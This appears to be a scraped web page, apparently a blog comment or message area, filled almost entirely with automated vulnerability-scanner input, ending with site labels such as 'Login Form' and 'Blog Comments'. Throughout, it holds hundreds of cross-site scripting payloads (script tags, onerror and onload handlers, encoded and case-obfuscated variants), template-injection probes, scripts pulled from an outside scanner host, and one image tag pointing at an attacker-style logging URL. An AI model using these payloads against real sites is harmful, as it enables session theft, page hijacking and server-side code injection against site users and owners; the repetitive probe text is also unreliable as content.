dfb__${98991*97996}__::.x

dfb{{98991*97996}}xca

555<isindex type=image src=1 onerror=WjEX(9662)>

'}}dfb{{98991*97996}}xca

dfb{{'abcd'.toUpperCase()}}xca

<%={{={@{#{${dfb}}%>

555\u003CScRiPt\zcb4(9606)\u003C/sCripT\u003E

555

555<img src=xyz OnErRor=bkv9(9993)>

<%={{={@{#{${dfb}}%>

555\u003CScRiPt\5bDH(9619)\u003C/sCripT\u003E

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<iframe src='data:text/html

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img/src=">" onerror=alert(9620)>

dfb[[${98991*97996}]]xca

555<iframe src='data:text/html

'}dfb[[${98991*97996}]]xca

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555&lt

555

<th:t="${dfb}#foreach

555<ScRiPt >HUu0(9916)</ScRiPt>

555&lt

555

555<ScRiPt >JyYT(9107)</ScRiPt>

555<body onload=QAQp(9031)>

555<WDSZGF>VDWZL[!+!]</WDSZGF>

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

555<body onload=WjEX(9989)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%62%6B%76%39%289489%29%3C%2F%73%43%72%69%70%54%3E

'dfb__${98991*97996}__::.x

555

\xf6<img zzz onmouseover=5bDH(98811) //\xf6>

555<script>HUu0(9358)</script>

555<img src=//xss.bxss.me/t/dot.gif onload=QAQp(9754)>

\xf6<img zzz onmouseover=zcb4(98331) //\xf6>

<th:t="${dfb}#foreach

<th:t="${dfb}#foreach

555<img src=//xss.bxss.me/t/dot.gif onload=WjEX(9247)>

dfb[[${98991*97996}]]xca

555<ScR<ScRiPt>IpT>HUu0(9740)</sCr<ScRiPt>IpT>

555\u003CScRiPt\bkv9(9269)\u003C/sCripT\u003E

555<WRPMNY>UJF4D[!+!]</WRPMNY>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<input autofocus onfocus=5bDH(9965)>

555<input autofocus onfocus=zcb4(9442)>

555

'}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

555<img src=xyz OnErRor=WjEX(9468)>

555&lt

dfb__${98991*97996}__::.x

555'"()&%<zzz><ScRiPt >lAI4(9723)</ScRiPt>

555<img src=xyz OnErRor=QAQp(9487)>

555<script>JyYT(9149)</script>

555<ScRiPt >fdDm(9163)</ScRiPt>

555<ScRiPt >HUu0(9453)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

1}}dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<a HrEF=http://xss.bxss.me></a>

555

555<WFJUEY>LT3PV[!+!]</WFJUEY>

\xf6<img zzz onmouseover=bkv9(98911) //\xf6>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img/src=">" onerror=alert(9687)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9477></ScRiPt>

555<img/src=">" onerror=alert(9936)>

555<ScR<ScRiPt>IpT>JyYT(9923)</sCr<ScRiPt>IpT>

dfb{{98991*97996}}xca

555

'"()&%<zzz><ScRiPt >lAI4(9555)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555<script>fdDm(9371)</script>

555<input autofocus onfocus=bkv9(9417)>

<a HrEF=jaVaScRiPT:>

555<ScRiPt >HUu0(9115)</ScRiPt>

1%}dfb{{98991*97996}}xca

555

555<ScRiPt >CRFZ(9521)</ScRiPt>

555}body{zzz:Expre/**/SSion(5bDH(9118))}

%35%35%35%3C%53%63%52%69%50%74%20%3E%57%6A%45%58%289009%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt >JyYT(9104)</ScRiPt>

555<ScR<ScRiPt>IpT>fdDm(9283)</sCr<ScRiPt>IpT>

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%51%41%51%70%289693%29%3C%2F%73%43%72%69%70%54%3E

5559588822

555<WP1175>TEU8J[!+!]</WP1175>

dfb{{98991*97996}}xca

<a HrEF=http://xss.bxss.me></a>

555<svg \xa0onload=HUu0(9539)

555}body{zzz:Expre/**/SSion(zcb4(9996))}

dfb__${98991*97996}__::.x

555\u003CScRiPt\WjEX(9994)\u003C/sCripT\u003E

555jDz2C <ScRiPt >5bDH(9835)</ScRiPt>

1}dfb{98991*97996}xca

555<ScRiPt >fdDm(9170)</ScRiPt>

555\u003CScRiPt\QAQp(9442)\u003C/sCripT\u003E

dfb[[${98991*97996}]]xca

555<script>CRFZ(9553)</script>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9042></ScRiPt>

bfg9874\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9874

555<isindex type=image src=1 onerror=HUu0(9258)>

555&lt

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb[[${98991*97996}]]xca

555UNOaA <ScRiPt >zcb4(9540)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555<iframe src='data:text/html

555<WASUCY>HEO9V[!+!]</WASUCY>

1}dfb${98991*97996}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9065></ScRiPt>

bfgx2833\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2833

\xf6<img zzz onmouseover=WjEX(96481) //\xf6>

dfb__${98991*97996}__::.x

555<WPM0PO>LAIBA[!+!]</WPM0PO>

555&lt

555<ScRiPt >JyYT(9433)</ScRiPt>

555<ScRiPt >PClX(9635)</ScRiPt>

555<ScR<ScRiPt>IpT>CRFZ(9889)</sCr<ScRiPt>IpT>

555<body onload=HUu0(9099)>

555}body{zzz:Expre/**/SSion(bkv9(9773))}

555<ifRAme sRc=9862.com></IfRamE>

<%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<input autofocus onfocus=WjEX(9559)>

1}dfb#{98991*97996}xca

555<ScRiPt >fdDm(9272)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=HUu0(9719)>

\xf6<img zzz onmouseover=QAQp(97121) //\xf6>

555<WFTOZX>CHSMJ[!+!]</WFTOZX>

555<svg \xa0onload=JyYT(9924)

555<ifRAme sRc=9388.com></IfRamE>

555

555<aMxP6Bk x=9552>

555<ScRiPt >CRFZ(9981)</ScRiPt>

555<img src=xyz OnErRor=HUu0(9192)>

555<svg \xa0onload=fdDm(9028)

1}dfb{#98991*97996}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555NIeB2 <ScRiPt >bkv9(9197)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<input autofocus onfocus=QAQp(9294)>

555<isindex type=image src=1 onerror=JyYT(9671)>

555<img sRc='http://attacker-9658/log.php?

555<ScRiPt >gkFz(9556)</ScRiPt>

555<ScRiPt >Vh68(9122)</ScRiPt>

555<WMDFLT>DSERN[!+!]</WMDFLT>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9735></ScRiPt>

<th:t="${dfb}#foreach

<a HrEF=jaVaScRiPT:>

555<ajtVZpA x=9051>

555<script>PClX(9884)</script>

555<img/src=">" onerror=alert(9965)>

1}dfb{@98991*97996}xca

555<isindex type=image src=1 onerror=fdDm(9574)>

555}body{zzz:Expre/**/SSion(WjEX(9285))}

555<ifRAme sRc=9766.com></IfRamE>

555<iframe src='data:text/html

555

<a HrEF=http://xss.bxss.me></a>

WhatsUp

Login Form

My Resource

Blog Comments